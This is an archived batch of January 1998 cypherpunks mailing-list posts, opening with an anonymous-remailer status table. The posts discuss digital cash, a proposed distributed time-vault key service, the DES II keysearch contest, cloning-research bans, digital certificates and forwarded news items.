(nym lcs)
(valdeez arrid hera)

This remailer list is somewhat phooey. Go check out
http://www.publius.net/rlist.html for a good one.

Last update: Thu 23 Oct 97 15:48:06 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
hera     goddesshera@juno.com             ------------  5:03:45  99.86%
nym      config@nym.alias.net             +*#**#**###       :34  95.82%
redneck  config@anon.efga.org             #*##*+#****      2:00  95.44%
mix      mixmaster@remail.obscura.com     +++ ++++++*     19:18  95.27%
squirrel mix@squirrel.owl.de              -- ---+---    2:34:19  95.16%
cyber    alias@alias.cyberpass.net        *++***+ ++      11:26  95.11%
replay   remailer@replay.com              ****   ***      10:06  94.93%
arrid    arrid@juno.com                   ----.------   8:50:34  94.41%
bureau42 remailer@bureau42.ml.org          ---------    3:38:29  93.53%
cracker  remailer@anon.efga.org           +  +*+*+*+      16:32  92.80%
jam      remailer@cypherpunks.ca          +  +*-++++      24:14  92.79%
winsock  winsock@rigel.cyberpass.net      -..-..----    9:59:18  92.22%
neva     remailer@neva.org                ------****+   1:03:02  90.39%
valdeez  valdeez@juno.com                               4:58:22 -36.97%
reno     middleman@cyberpass.net                        1:01:28  -2.65%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Mon, 12 Jan 1998 15:24:00 +0800
To: Ryan Lackey <rdl@MIT.EDU>
Subject: Re: Eternity Services
In-Reply-To: <199801120523.AAA12947@the-great-machine.mit.edu>
Message-ID: <Pine.BSF.3.96.980112080745.14660F-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 12 Jan 1998, Ryan Lackey wrote:
[quoting Tim]
> 
> > (* I say "working" in the sense that the concept was very easy to
> > demonstrate just by using PGP and remailers. Not much more than what I
> > demonstrated in 1993 would be needed to deploy a real system. Except for
> > one thing: true digital cash. Not the bullshit one-way-traceable stuff that
> > Chaum and others are now pushing, but the original, online-cleared or
> > escrow-cleared form, a la the work of Goldberg et. al. For some of these
> > applications, below, simple token- or coupon-based schemes might work
> > adequately.)
> 
> There are currently-under-development systems which will meet the digital cash 
> requirement,
> from people who I consider highly respectable and competent.

And the demand for such ecash systems is real. I personally carried a $10
million offer for a non-exclusive license for the blind signature patent
to David Chaum. He declined the offer. "The patent is not for license". 
DigiCash's CEO since March of last year, Mike Nash, also told me that
DigiCash was not considering licensing the patent. I knew that day that it
was time to quit. Not surprisingly, nobody heard from DigiCash since. 

-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.
   "Tonga? Where the hell is Tonga? They have Cypherpunks there?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kay Ping <kping@nym.alias.net>
Date: Mon, 12 Jan 1998 16:49:45 +0800
To: cypherpunks@toad.com
Subject: Trust through anonymity; time vaults
Message-ID: <19980112083354.29846.qmail@nym.alias.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Trust and anonymity may seem to be in contradiction but I intend to show
how anonymity can be used to achieve trust.

At the base of any cryptographic system is a trust model and it can only
be as strong as the assumptions made by the trust model. Of special
interest to us are distributed trust models. This posting was sent through
a chain of remailers. I do not need to trust any of them completely, just
assume that the chances that all of them are colluding or have been
compromised by an attacker are low.

Other types of services requiring a server infrastructure can be
implemented using distributed trust models. For example, I can submit a
document to be timestamped by several servers. Someone checking the
validity of the combined timestamps can have higher assurance that the
timestamp has not been generated by collusion between the document owner
and the timestamping service or by a compromised timestamper key.
Another type of service which can use a distributed trust model is a
digital time vault which will be described later.

One of the problems with distributed trust is reliability. A service can
be interrupted by any of the servers going down. The overall reliability
goes down exponentially with the number of servers. This can be solved
for some types of services by using a secret-splitting algorithm
requiring a minimum of N out of M parts. A user can select values of N
and M that satisfy both his reliability requirements and his paranoia.

But some are more paranoid than that. It may take a very large number of
unrelated servers around the world to earn their trust and an even larger
number to get acceptable reliability.

To those I propose the following idea:

Some of the servers will be anonymous. If they don't know each other, they
can't collude. If they are anonymous it will be hard for an attacker to
know which machine to break into.

One of the problem with this approach is that an opponent with sufficient
resources can set up a large number of anonymous servers and hope that a
user chooses a set of servers of which at least N are under his control.

If the user chooses a combination of anonymous and well-known servers he
gets good protection against this scenario. Even if all the anonymous
servers are run by <pick your favorite three letter acronym agency> it is
unlikely that they will collude with servers run by, let's say,
well-known remailer operators in other countries.

Anonymous server operators may try to collude but selfishness will stand
in their way: even if N-1 servers revealed their parts of the secret, the
last one can always refuse to cooperate and use the information, so none
of them has an incentive to reveal his part in the first place.
Simultaneous secret trading protocols will not help- they cannot
guarantee that a valid secret is contained in the message. The only way
to get selfish operators to cooperate is using zero-knowledge proofs of
their secrets. Zero-knowledge proofs work only for specific types of
secrets. It may be possible to use secrets for which zero-knowledge
proofs do not work.

The specific service I had in mind for this distributed trust model is a
digital time vault. It allows a sender to encrypt a message which can
only be decrypted after a certain date.

This is done by having a server generate secret/public key pairs for
future dates, publish all public keys at once and publish the private key
for each date at that date. Only after that date the message can be
decrypted. For reliability and security the message (or the session key)
can be split and encrypted it to the public keys of "next Friday"
published by several different servers.

This service can be used to send a public message that can only be read
after a certain date, without any action required by the sender at that
date. This may be useful if the sender suspects that he may be under
arrest, dead or otherwise uncapable of getting online at the target date.

Another possible use for this service is to destroy information to
protect yourself against threats or court orders and still be able to
recover it at a later date. Even if you don't actually do it, the
existence of the service gives you plausible deniability.

Many types of secret information are only secret for a limited time -
until an announcement is made or a deal is signed. Encrypting a message
to a future date as well as the intended recipient allows storing the
message in an unsecured archive for later reference.

This service can be implemented using existing software like PGP without
secret splitting algorithms: a conventional encryption passphrase is
encrypted to several different chains of public keys of the same date on
different servers, using combinations that create the same N out of M
result.

Since the time servers do not receive any information or participate in
the process in any way they will not generate any significant load except
during initial key generation. They can also be kept anonymous very
easily and cannot be held accountable for anyone's use of the service.
The servers will still attract attacks. Anonymous servers will get some
protection against this since their location is not known. Public servers
can protect themselves by encrypting future private keys to future date
keys on other servers and keep encrypted backups off-site. This should be
done carefully to ensure that future keys will not be lost because of
loops or servers going down.

Anyone wants to run such a service? You can run either an anonymous or
public server. You should run a public server only if you think your
reputation is good and you public key is trusted by many people. If you
want to run an anonymous server generate a new key without email or any
other identification except a pseudonym for the server.

You must commit to maintaining the service for a minimum period and
publish all the private keys for which you published the initial public
keys, but never before their time. The trial period for this service will
be three months and the interval will be one week, posted at midnight on
the beginning of the week, GMT. Date keys must be signed by the server
key.

Date private keys must have an empty passphrase so they can be used by
anyone after they are published. Until then they should be secured for
storage. Date Key IDs consists of a date in YYYYMMDD format followed by
the server name. The name may be followed by an optional email address of
the maintainer.

For the trial period keys should be published to alt.privacy.anon-server
and the list. Lists of public keys and past private keys should be
available through http, ftp or finger. If you run an anonymous server you
may ask someone, preferably a maintainer of a public server, to get your
lists and make them available.

The trial will let us experiment with this trust model and see if anyone
thinks of interesting ways to use the service.




- -----------------
Kay Ping 
nop 'til you drop

finger kping@nym.alias.net for key
DF 6D 91 18 A6 59 41 96 - 89 01 69 B7 9D0 4 AE 53

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: cp850

iQEPAwUBNLnGZRHPAso8Qp7tAQHnkwfQ9BpL82R1Mw1WY9EnOaFuXme+2y+OZZ60
Cb41fVtlSDC9EmAjAuV9K1dDP7FVGwFzGQ5j04IjgLocMbUgEyZDkKoFhe2Hgasw
XU2ick5adCsvA8I0USfMVeQj2L6tkzc+hr4l9NXH7AGEQQGZu2iZTlDNn72FNBeo
7gPjxj8/a/T2+zKMyJbS2ujYa4ZBuypXpQg2UaQ42m1uKUz/ymJFXcm51X1Do3hJ
TC2tvIST+v/cfYesblhAR1kRVAiKL+YUagLeWMU1I5X64E2MKVctOiPWBSHCLgQ0
LKtrwIHIvrIP2z0FMquR5GricvrLdFid89vtZFb1n8quQg==
=uVxx
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Tue, 13 Jan 1998 02:23:31 +0800
To: cypherpunks@toad.com
Subject: Re: [Humor] Kennedy's New Legislation
In-Reply-To: <3.0.5.32.19980111002729.007cc410@otc.net>
Message-ID: <3.0.5.32.19980112090824.007c4660@206.40.207.40>
MIME-Version: 1.0
Content-Type: text/plain



At 09:17 AM 1/11/98 EST, Dr.Dimitri Vulis KOTM wrote:
>David Honig <honig@otc.net> writes:
>>
>> Bogus reasoning.  You are sovereign and can do with yourself as you please.
>>  *That* is why substances should be legal and helmets should be optional.
>> Pragmatics are irrelevant.  I *do*
>> wear seatbelts but it should be my choice, not
>> something the state can use violence to enforce.
>
>The above is just one of the reasons why all drugs should be legalized.

Yes, that was the moral one.

>As for helmets, seatbelts, et al, consider them in context: most kids
>stupid enough to ride a bike wihtout a helmet are already on welfare.
>If they get themselves certified brain-damaged (I don't know how the
>doctors tell the difference :-) they'll be stealing even more of my money
>through taxes. Therefore in the context of taxpayers paying the medical
>bills of these parasites, helmets can be required.

There is a shortage of organ donors.  Motorcycle helmet laws cut 
down the supply.  There's your pragmatics, happy now?




------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

	"How do you know you are not being deceived?" 
	---A Compendium of Analytic TradeCraft Notes, 
	     Directorate of Intelligence, CIA
	     http://www.jya.com/cia-notes.htm
















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian B. Riley" <brianbr@together.net>
Date: Mon, 12 Jan 1998 22:38:47 +0800
To: "David Miller" <cypherpunks@Algebra.COM>
Subject: Re: Eternity Services
Message-ID: <199801121429.JAA25262@mx02.together.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

On 1/11/98 6:35 PM, David Miller (dm0@avana.net)  passed this wisdom:

>There is one thing that comes to mind that was just a topic covered 
>on this list and that is the use of cellular/wireless/RF/ham for 
>connections to said machines.
>
>Obviously, this would make seizure more difficult (and perhaps 
>increase the likelyhood of prior warning, if for example, cellular 
>service was suddenly cut off).
>
>I am currently studying some parallels between the established FCC 
>tolerance of ham radio self-regulation vis-a-vis anonymous 
>remailers. I haven't yetdrawn up my opinions, as they are still 
>being formed. I think that this might be one avenue to look down as 
>there is obviously a type of legal precident in what is 
>allowed/tolerated under obvious FCC jursidiction, whereas the 
>jurisdiction over IP is obviously still ambiguous.

 On the surface there would appear to be some parallels worth thinking
upon with regard to ham/FCC. but the ham radio community for the most
part qualifies under the category of 'sheeple'. Separate out the
hotheads and idiots and you have a handful of forward thinkers who
want to try to push the envelope held back by the vast majority of
reactionaries. Even when the forward thinkers want to push the
envelope within the rules, not even asking for relaxed or waived
rules, they react with 'this is not the way we have always done it.'
The FCC and the Washington establishment is well aware of this and
that is why they more or less leave hams alone to regulate their own
quiet little tea party.

 I cannot see the FCC looking kindly on the use by hams or
establishment of a Citizen's Radio Data Service (as has been proposed
several times through the years) to establish a secured delibrately
obscured data network. As far as hams are concerned they are limited,
right off the bat, by regulations prohibiting use of 'codes or
encipherment whose purpose is to obscure the meaning of the
message(data).' The ham self-regulation may be a precedent, but I
don't think it would provide any leverage on this matter. Of course,
there is always steganograpy ... one man's GIF is another mans data.

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQEVAwUBNLokrj7r4fUXwraZAQFbWAf9GtQyI1PSRO8H4Iyb5Wp4xrWzMKbZuIHx
rdQtM3wEjL0l64u5gCFb082GDZWYJcj0wcehaLMn9BOp8QrooiGv9XstHqlHNYjL
/0dLTS4CT/qKkUl/68yqjB5i1KbDip1cO74dCcBVt/8G1S3IcjAGYP1V3nJtxwJ6
GlLjel9qQW4zzvnBOtQiD7HzU6V2FK5lIMa87zfuNvcREdlfyHG1L169sSq5CZEU
XT7HGxrXsmfnolgFPMqVrcIYlccc+m6vx6MmPY8XIM7vU1ybDk9wDC75Eg2aSZVw
5fQn6CogpnootVHczSog3xg3RDZkgmm0xhArbBdBNjopxScEUvIjFg==
=m+3f
-----END PGP SIGNATURE-----


Brian B. Riley --> http://members.macconnect.com/~brianbr
 For PGP Keys  <mailto:brianbr@together.net?subject=Get%20PGP%20Key>

 "The illiterate of the 21st century will not be those who cannot read and
  write, but those who cannot learn, unlearn, and relearn."   -Alvin 
Toffler






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Tue, 13 Jan 1998 02:23:30 +0800
To: cypherpunks@cyberpass.net
Subject: Clinton in Texas last Friday (1/9/98, 6 pm CST)
Message-ID: <Pine.GSO.3.95.980112101221.26006C-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain




[...]

And I want you to see your dreams and your life against a larger landscape
of America's dream and America's life.  We already have one foot in the
21st century, and it's a time that will be very, very different from the
immediate past.  How will it be different? Well, you know and you see and
you feel it here in Texas. 

	First of all, there will be the phenomenon of globalization -
people and products and ideas and information will move rapidly across
national borders - both the borders that touch us like Texas and Mexico,
and the borders that are beyond the oceans that require us to fly or to
communicate in cyberspace.

	Secondly, there is a phenomenal revolution in information and
science and technology.  Not only can children in Houston communicate with
children in Australia on the Internet, or go into libraries in Europe to
do research, but the very mysteries of the human gene are being unraveled
now in ways that offer breathtaking possibilities, to preserve the quality
and the length of human life, to fight back disease, and to bring people
together at a higher level of humanity than we've ever known. That's all
very encouraging.

[...]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Womack <thomas.womack@merton.oxford.ac.uk>
Date: Mon, 12 Jan 1998 18:59:40 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: More on the DES II contest.
Message-ID: <01bd1f47$5beb0570$409001a3@mc64.merton.ox.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



>My greatest fear with DES II is that if d.n finds the key
>early in the search, they may decide to sit on it until
>just before the 540 hour deadline. If they are the only
>group with a credible chance of finding the key (as far as
>I know, this is the case), then their payback is maximized
>by by this tactic, since the time limits for the June
>contest are determined by the speed with which the key is
>found in January.


But the question is one of how fast the key-search can be made, not of when
the key would be found - and I though the d.n website displayed a figure for
keys-per-second. That it takes the network not very long to find the DES key
0x0809182395f8ee isn't a very interesting piece of data; the keys-per-second
figure is more useful.

Tom





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 13 Jan 1998 04:37:31 +0800
To: cypherpunks@Algebra.COM
Subject: Talk of Banning Research into Human Cloning
Message-ID: <v03102800b0e02a107673@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain




This has some tangential list relevance in that it involves the Brave New
World, so to speak, of the government deciding what research is legal and
what is not.

Clinton is asking Congress to ban research into human cloning.

Importantly, this is not a proposal to cut federal funding of such efforts,
as this would be unexceptionable (except to certain obscurantists). That
is, the NSF or HHS or NIH or whatever is free to not fund all sorts of
research projects. (Obviously many of us would cut nearly all such funding.)

No, Clinton is asking for Congress to *ban* such research, regardless of
where the funding came from. "Clone a cell, go to jail."

"Clinton's proposal would make illegal any attempt to create a human being
using the so-called somatic cell nuclear transfer technology that produced
Dolly the sheep, in which an adult cell was fused with an egg. "

Though I'm not a constitutional expert, this would seem to me to be a
violation of various rights. A First Amendment right to speak and publish
as one wishes for one, a Fourth Amendment right against search and seizure
and to be secure in one's papers, and probably more general rights that
have long-held that government agents cannot tell people what books they
may read, what thinking they may do, and  whom they may asssociate with (if
the Civil Rights Act is viewed as the unconstitutional anomaly it is).

Only a very few types of research are banned. And these are all ostensibly
"national security" areas. Namely, chemical and biological warfare
research, heavily regulated (private companies can do such research, but
only with government approval, supervision, and generally _for_ the
government). And nuclear weapons research (probably as part of the Atomic
Energy Act).

(If anyone can think of other "bans on research," besides weapons areas,
let me know.)

But a ban on cloning research would not be a matter of "national security,"
only of ethics and religious beliefs. Whatever the arguments for banning
unapproved research into CBW and nuclear weapons, banning cloning research
is an entirely different set of issues.

Will Congress pass such a ban? Unknown. (They didn't pass the last such ban
Clinton asked for.)

Will the Supreme Court hear the case if such a ban is passed and then
challenged? Unknown.

Any implications for crypto? If Congress can successfully make certain
types of science illegal, felonizing the search for truth, why not a ban on
certain types of mathematics research?

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Tue, 13 Jan 1998 16:12:28 +0800
To: nobody@nsm.htp.org
Subject: Re: Congratulations!
In-Reply-To: <19980113000743.988.qmail@nsm.htp.org>
Message-ID: <Pine.BSF.3.91.980112124817.7093D-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain





On 13 Jan 1998 nobody@nsm.htp.org wrote:

> >To: Anonymous <anon@anon.efga.org>
> >cc: cypherpunks@toad.com, abuse@MCI.Com,   >hostmaster@cyber-dyne.com
> 
> Ha, ha, ha! who CC'd the "Congratulations" thread to those
> addresses?? <LOL> (would they know how to smurf d00d?)
> 
> This list gets fucking better!
> 
> 


http://www.security.mci.net/dostracker/index.html

;)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 13 Jan 1998 05:02:28 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Talk of Banning Research into Human Cloning
In-Reply-To: <v03102800b0e02a107673@[207.167.93.63]>
Message-ID: <v03102801b0e032b37e03@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:32 PM -0800 1/12/98, Tim May wrote:

>Only a very few types of research are banned. And these are all ostensibly
>"national security" areas. Namely, chemical and biological warfare
>research, heavily regulated (private companies can do such research, but
>only with government approval, supervision, and generally _for_ the
>government). And nuclear weapons research (probably as part of the Atomic
>Energy Act).
>
>(If anyone can think of other "bans on research," besides weapons areas,
>let me know.)

Before others point this out, there are certain types of "public safety"
laws about what one can research or do. Laws about explosives, dangerous
chemicals, and pathogens.

(The "ban on recombinant DNA research," following the Asilomar Conference
in 1975, was a voluntary ban, and thus not a ban in the sense I am using
here. And it last only a couple of years, until more could be learned about
the potential danges of recombinant DNA work.)

Please respond to my main points, if you respond at all, not to these side
points.

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 13 Jan 1998 03:13:39 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Economic spies increase US activity [CNN]
Message-ID: <199801121931.NAA22398@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>                    ECONOMIC SPIES INCREASE ACTIVITY IN U.S.
>                                        
>      Economics Graphic January 12, 1998
>      Web posted at: 11:38 a.m. EST (1638 GMT)
>      
>      LOS ANGELES (Reuters) -- Governments of at least 23 countries
>      including Germany, Russia, China, France and Israel have stepped up
>      their economic espionage against U.S.-based companies, the Los
>      Angeles Times, quoting the FBI, reported Monday.
>      
>      The newspaper said a new survey conducted by the American Society
>      for Industrial Security estimated that intellectual property losses
>      from foreign and domestic espionage may have exceeded $300 billion
>      in 1997 alone.
>      
>      More than 1,100 documented incidents of economic espionage and 550
>      suspected incidents that could not be fully documented were reported
>      last year by major companies in a survey conducted by the society,
>      The Los Angeles Times said. It said it had obtained results of the
>      survey which was scheduled to be released Wednesday.
>      
>      A 1996 Economic Espionage Act makes theft of proprietary economic
>      information in the United States a felony punishable by a $10
>      million fine and 15-year prison sentence.

[text deleted]


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 13 Jan 1998 03:10:53 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: College freshmen political interest at a nadir [CNN] (fwd)
Message-ID: <199801121932.NAA22439@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:
>From owner-austin-cpunks@ssz.com Mon Jan 12 13:31:10 1998
From: Jim Choate <ravage@ssz.com>
Message-Id: <199801121930.NAA22376@einstein.ssz.com>
Subject: College freshmen political interest at a nadir [CNN]
To: cypherunks@ssz.com
Date: Mon, 12 Jan 1998 13:30:47 -0600 (CST)
Cc: austin-cpunks@ssz.com (Austin Cypherpunks)
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Content-Length: 2144      
Sender: owner-austin-cpunks@ssz.com
Precedence: bulk
Reply-To: austin-cpunks@ssz.com


Forwarded message:

>              POLITICAL INTEREST AMONG COLLEGE FRESHMEN AT NEW LOW
>                                        
>      Graphic January 12, 1998
>      Web posted at: 1:37 p.m. EST (1837 GMT)
>      
>      WASHINGTON (AP) -- It is not easy peddling politics on a college
>      campus nowadays. Even talking about the issues is a turnoff,
>      according to a nationwide survey of freshmen.
>      
>      An annual study by the University of California, Los Angeles, for
>      the Washington-based American Council on Education found a record
>      low number of college freshmen showing much interest in politics.
>      
>      Just 27 percent of the nation's 1.6 million freshmen believed that
>      keeping up with political affairs is a very important life goal,
>      less than half the percentage recorded in 1966. Just 14 percent said
>      they frequently discussed politics, down from 30 percent in 1968.

[text deleted]


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 13 Jan 1998 04:14:26 +0800
To: cypherpunks@cyberpass.net
Subject: Zions Bancorp to offer Digital Certificates
Message-ID: <v04003906b0e01922054e@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date: Mon, 12 Jan 1998 10:47:01 -0800 (PST)
From: William Knowles <erehwon@dis.org>
To: DCSB <dcsb@ai.mit.edu>
cc: DC-Stuff <dc-stuff@dis.org>
Subject: Zions Bancorp to offer Digital Certificates
Organization: Home for retired social engineers & unrepented cryptophreaks
MIME-Version: 1.0
Sender: bounce-dcsb@ai.mit.edu
Precedence: bulk
Reply-To: William Knowles <erehwon@dis.org>

[Techweb 1.12.98] Zions Bancorp, a $9 billion regional bank
in Salt Lake City, this week will become the first financial
institution to offer a service that lets organizations use
digital certificates to secure internal and business-to-business
communications.

Digital certificates, which electronically confirm a user's
identity, are generated and managed by certificate authorities.
Companies can set up authorities themselves or use authorities
created by third parties.

Although certificate-authority services are available from
technology vendors [such as GTE, IBM, and VeriSign, Zions
said customers will feel more comfortable letting a bank manage
their digital certificates. "Banks in the paper world already do
this. They write letters of credit," said Michelle Jolicoeur,
director of government implementations at Digital Signature Trust,
the Zions unit that will offer the service. "Our business is trust."

Digital Signature Trust has conducted pilots of its service with
Utah's Department of Commerce, the Church of Jesus Christ of Latter
Day Saints, and internal departments for about a year.  The service
uses digital certificate software from several vendors, including
Certco, Entrust, GTE, VeriSign, and Xcert. Separately, Certco and
Entrust will unveil new features to their certificate-authority
offerings at the RSA Data Security conference in San Francisco
this week.

Oppenheimer Funds, which plans to implement digital certificates
by midyear to bolster IT security, is investigating whether to
operate its own certificate authority or to outsource. "A bank
is generally going to be a more stable company," said Jim Patterson,
an Oppenheimer technology vice president in Englewood, Colo.
"But on the other hand, do I want a bank that I currently don't
have a relationship with to know so much about me?"

Still, Patterson said digital certificates will be important
in business-to-business commerce and communications. "With
digital certificates, I can start getting or sending requests
to perform business functions over any medium I want, including
the public Internet," he said.

Pricing for the Digital Signature Trust service will be
subscription-based and will depend on the customer's
applications and number of certificates.


==
The information standard is more draconian than the gold
standard, because the government has lost control of the
marketplace.  --  Walter Wriston
==
http://www.dis.org/erehwon/



For help on using this list (especially unsubscribing), send a message to
"dcsb-request@ai.mit.edu" with one line of text: "help".

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 13 Jan 1998 03:41:04 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Attn: Jeremy Day - your nameserver isn't working...
Message-ID: <199801122004.OAA22608@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



 I received traffic from a 'Jeremy Day' in the process of attempting a reply
 I find his nameserver is not responding.
 
 Forwarded message:
 
 > From jeremy@servers.toh Mon Jan 12 13:52:35 1998
 > Date: Mon, 12 Jan 1998 19:20:46 +0000 (   )
 > From: Jeremy Day <jeremy@servers.toh>
 > To: ravage@ssz.com
 > Subject: Re: A further thought on free markets & anarchy...
 > Message-ID: <Pine.LNX.3.95.980112190746.17818A-100000@fnord.servers.toh>
 > MIME-Version: 1.0
 > Content-Type: TEXT/PLAIN; charset=US-ASCII
 
 As to the specific issue that Jeremy raised in his note. I have no interest
 in carrying on a private discussion on this topic. If you would like to
 re-submit your post to the CDR I will respond to the points raised publicly.
 
 

    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 13 Jan 1998 06:47:30 +0800
To: Tim May <tcmay@got.net>
Subject: Re: rant on the morality of confidentiality
In-Reply-To: <v03102802b0ddc3eab7fa@[207.167.93.63]>
Message-ID: <199801122244.OAA23868@netcom12.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



the original claim, which I don't really care much and find pretty
obvious, such that I am not really even all that interested in
debating the point except for amusement, was that

"science advances only through the open literature"

its a tautology in a sense that I was referring to collaborative
science, not private experiments. science in its most powerful
form, that in service to humanity, is of course not this type,
although I wouldn't be surprised if a antisocial anarchist
for example confused the two either deliberately or through
a characteristically muddled mind.

>Doesn't matter how the establishment (whatever that might be) looked on him
>or not...

well, the original  point was about "establishment science"..

>My main point has been to refute your notion that any one who elects not to
>publish in the open literature cannot be a scientist. I know of many
>scientists who could not publish, or chose not to for various reasons.

ah yes, scientists in their own mind, like that saying, "a legend in
his own mind"

